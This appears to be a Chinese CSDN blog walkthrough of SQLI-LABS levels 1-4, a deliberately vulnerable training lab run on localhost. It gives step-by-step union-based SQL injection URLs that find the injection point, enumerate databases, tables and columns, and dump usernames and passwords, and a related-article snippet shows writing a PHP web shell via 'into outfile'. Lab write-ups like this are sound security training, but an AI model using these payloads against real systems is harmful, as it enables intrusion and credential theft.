SQLI-LABS总结1-4之报错回显

最新推荐文章于 2024-08-05 18:08:11 发布
最新推荐文章于 2024-08-05 18:08:11 发布
阅读量1.2k 收藏 2
点赞数 1
分类专栏: sql学习 文章标签: sqli-labs sql注入 报错回显
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41652128/article/details/88547340
版权

SQLI-LABS总结1-4之报错回显

前言: sql注入原理:把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令

现象:有具体的报错回显,且返回数据库中的数据
思路:
1.判断注入点
2.通过报错信息知道如何闭合参数
3.猜字段数及其回显
4.构造语句获取想要的信息

Less-1

1.判断注入点

http://127.0.0.1/sqli-labs-master/Less-1/?id=1  //正常
http://127.0.0.1/sqli-labs-master/Less-1/?id=1'  //报错
http://127.0.0.1/sqli-labs-master/Less-1/?id=1"  //正常

报错语句:
在这里插入图片描述可知用’闭合参数

2.猜字段数

http://127.0.0.1/sqli-labs-master/Less-1/?id=1' order by 3-- #

3.判断显示位

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,3-- #

在这里插入图片描述
可知2,3列是显示位

注:sql语句的执行结果只有第一行会被回显在页面上,所以我们要把原始语句的的结果集变为空,这样我们想要的结果才能显示在界面上。即将参数id的值设为-1。

4.构造语句注入查询想要的信息

查询基本信息

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'union select 1,concat_ws(',',user(),version(),database()),3-- #

在这里插入图片描述

注:
user():当前用户
version():当前使用版本
database():当前数据库

爆库

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata-- #

在这里插入图片描述

注:
nformation_schema数据库:mysql的自带系统库,安装完就有,记录是当前数据库的数据库,表,列, 用户权限等信息。SCHEMATA表:储存mysql所有数据库的基本信息,包括数据库名(SCHEMA_NAME),编码类型路径等。
TABLES表:储存mysql中的表信息,包括这个表(TABLE_NAME)所属那个数据库(TABLE_SCHEMA),是基本表还是系统表,表有多少行,创建时间等。
COLUMNS表:储存mysql中的列信息,包括某张表(TABLE_NAME)的所有列(COLUMN_NAME)以及所属数据库(TABLE_SCHEMA)的信息,列的数据类型,列的编码类型,列的权限等。

爆表(security)

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'-- #

在这里插入图片描述

爆列(users)

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'-- #

在这里插入图片描述

爆数据

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'union select 1,username,password from users where id=3-- #

在这里插入图片描述

Less-2

1.判断注入点

http://127.0.0.1/sqli-labs-master/Less-2/?id=1 //正常
http://127.0.0.1/sqli-labs-master/Less-2/?id=1' //报错

在这里插入图片描述
可知是数字型注入,不加即可闭合参数,剩下的和Less-1的payload一样,去掉单引号即可。

Less-3

1.判断注入点

http://127.0.0.1/sqli-labs-master/Less-3?id=1 //正常
http://127.0.0.1/sqli-labs-master/Less-3?id=1' //报错

在这里插入图片描述
可知用’)即可闭合参数,剩下的Less-1的payload一样,将’改为’)即可。

Less-4

1.判断注入点

http://127.0.0.1/sqli-labs-master/Less-4?id=1 //正常
http://127.0.0.1/sqli-labs-master/Less-4?id=1  //正常
http://127.0.0.1/sqli-labs-master/Less-4?id=1"  /报错

在这里插入图片描述
可知用")闭合参数,将Less-1的payload中的改为")即可。

_slience
关注
专栏目录
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
(手工)【sqli-labs13-14】POST注入:报错回显(基本步骤)
07-07 822
SQL-POST】报错回显
SQL注入漏洞--报错/union/布尔盲注/时间盲注
嘿嘿嘿
05-02 1460
之前介绍了数据库的基本操作,今天这篇文章就来实操SQL注入。阅读本文前可以先看一下基本操作,有助于更换理解。。。
Sqlilabs靶场报错注入:less1~6
最新发布
ningwangh的博客
08-05 435
首先做SQL注入,需要知道注入参数是什么,不是所有的参数都是id,也能是file等等。判断注入,注入很重要,如果找不到注入的地方,测试什么参数都是在浪费时间。发现与上面用id=1的结果相同,应该是没有逃脱出单引号的控制,应该去闭合单引号,而单引号需要成对出现。与less-5相同,也可以先查询username,在查询password。在这里我输入了id=1,显示出这个结果,说明并没有对用户的输入做过滤。id=0',会显示错误,表示存在注入,且使用'闭合。下一步,获得数据库名,表名,列名,数据。
SQL注入-可回显报错注入:简介、相关函数、利用方法
05-29 1926
SQL注入-可回显
sqli-lab安装中遇到的报错
不止点点点的博客
05-08 3820
sqli-lab安装报错 mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in Can't connect to MySQL server on 'localhost' (10061)
sqli-labs-master靶场搭建以及报错解决
qq_53058639的博客
04-14 1669
一.前提准备1.下载:sqli-labs-master。2.安装PHP study。二.搭建靶场1.启动phpstudy。2.将sqli-labs-master.zip解压到phpstudy_pro\WWW,为访问方便我这将其更名为sqli。3.打开我们的sqli。4.在url中的localhost后输入/sqli即可成功进入。5.到这一步,我们的sqli已经搭建成功,此时我们击发现出错了。三.问题解决。
sqli-labs-php7-master.zip
04-06
sqli-labs-php7-master提供了一系列逐步升级的实验,涵盖了基础到高级的SQL注入技术,包括错误回显、盲注、时间基注入、联合查询等。 实验平台通常分为多个级别,每个级别都对应一个特定的漏洞,用户需要利用这些...
sqli-labs实验指导手册
11-17
1. **字符型联合注入**(如less-1): - **注入检测**:通过修改查询参数(如?id=1' and 1=1),观察页面响应变化来判断是否存在注入。 - **闭合方式判断**:通过输入特殊字符(如\)来测试闭合方式,确认是单...
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
### SQLi-LABS Page-1 (Basic Challenges)1-22 知识解析 #### 第一关:Less-1 - 字符型注入 在这一关卡中,我们需要找到一个可注入,并通过该执行SQL注入攻击。具体步骤如下: 1. **访问靶场**: - 访问...
sqli-labs.rar
07-06
8. **字符编码与转义**:了解如何通过改变字符编码(如从UTF-8转到ISO-8859-1)来绕过过滤机制,以及如何正确地转义和过滤用户输入以防止注入。 9. **防御策略**:学习使用预编译语句(Prepared Statements)、参数...
基于错误回显SQL注入整理
12-14
由于复习,停了好几天,换换模式做了一下关于错误回显的ctf题目,首先附上题目:here   整理了一下网上的一些关于错误回显的方法,在这里不带上地址了,请大牛们原谅:P   0x00 关于错误回显   用我自己的话来讲,基于错误回显sql注入是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你偷着乐吧)。   0x01  用于错误回显sql语句(下面的函数撸主只在mysql下试过也能成功,其他数据库有待考证,待有实例的时候会补充)   第一种:  基于 rand()  与  group by 的错误  
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs(安装与配置)报错原因
qq_50034496的博客
07-28 874
sqli-labs(安装与配置)报错原因
安装sqli-labs时,发生的错误(1),资深网络安全开发带你入门Framework
2401_83621095的博客
04-14 172
【代码】安装sqli-labs时,发生的错误(1),资深网络安全开发带你入门Framework。
安装sqli-labs时,发生的错误
qq_52333044的博客
02-27 501
先才搞这个的时候,在网上搜了一些,在php.ini改或者换成mysqli_onnect(),这些都比较麻烦,其实主要的问题是php版本可能太高了。在sqli-labs-master\sql-connections里面有个db-creds.inc文件,打开并修改账号密码。php版本一定要设置成 7 以下,7之后的mysql_都改成了mysqli_了,用7以上版本的话会报错。当然如果你是因为修改了数据库密码,导致的错误可以在。所以改成低版本就行了。
sql_lab无法报错回显解决办法
weixin_46456532的博客
04-30 589
前言 之前我也有这种问题不知道怎么弄 我也是一步一步按着教程弄的,但是还是没有办法回显报错,网上也没有关于这个的的教程(可能是我没找到) 解决办法 把php的版本换成5.4.45, 是魔术引号的问题,php版本5.2.17,文件里面是打开了魔术引号的,关了就行,php配置文件的magic_quotes_gpc = Off 我改的是版本(方便) 希望可以帮到你们(笑脸) ...
SQL--报错回显注入
weixin_30412577的博客
08-21 299
1、floor()函数 原理: 利用rand()函数与group()函数的相互冲突,floor()是向下取整函数,floor(9.99)=9.0 语法结构: username=admin' and (select 1 from (select count(*), concat(floor(rand(0)*2),0x23,你想获取的数据的sql语句)x from information_sc...
sqli-labs回显数据库
09-13
很抱歉,我不能提供任何关于 SQL 注入实验室(sqli-labs)中回显数据库的具体方法。SQL 注入是一种违法行为,违反了计算机安全和隐私法律规定。我鼓励合法的计算机安全实践,并不能支持或提供任何与非法活动相关的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值